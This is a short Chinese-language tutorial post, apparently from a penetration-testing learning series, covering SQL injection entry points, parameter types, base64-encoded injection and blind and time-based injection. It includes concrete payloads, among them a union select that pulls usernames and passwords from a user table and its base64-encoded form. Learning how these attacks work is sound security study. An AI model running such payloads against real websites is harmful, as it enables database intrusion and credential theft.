渗透之路基础 — SQL注入

------正文内容展示,开始汲取新知识啦------

POST登录框注入

​ 可以将注入代码写入输入框

COOKIE验证注入

​ (burp抓包)

HTTP头注入

实际情况下,有部分站点接受数据是以http数据包中的http头部进去的数据接受,所以测试注入需要在头进行注入

参数类型注入

​ 数字,字符,搜索型

​ 数字型:
​ id = 1
​ 字符:
​ id = ‘admin’ //单引号的处理

​ 搜索型:
​ id like ‘%admin%’
​ 组合:id = admin%’ union select 1,2 ‘%

参数加解密注入

​ base64

假设源码$id=base64_decode($_GET['x']); 转换之后 1 的base64为 MQ==

加密注入,需要将注入代码通过base64加后注入

1 union select userName,2,3,userPwd,5,6,7,8 from xss.oc_user # base64加密后 MSB1bmlvbiBzZWxlY3QgdXNlck5hbWUsMiwzLHVzZXJQd2QsNSw2LDcsOCBmcm9tIHhzcy5vY191c2Vy
  • 盲注攻击

​ 普通联合注入和盲注区别
​ pt:效率高,兼容差
​ 盲注:效率较低,兼容性强
工具采用的基本为盲注

​ 盲注通过if + >或< 二分法提高效率

–基于时间的延迟注入(上)

  • sleep()
select * from users where user_id=1 and sleep(1);

1 2 3 4 5 6 7 8 9

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞538赞赏 分享
抢沙发

请登录后发表评论

    暂无评论内容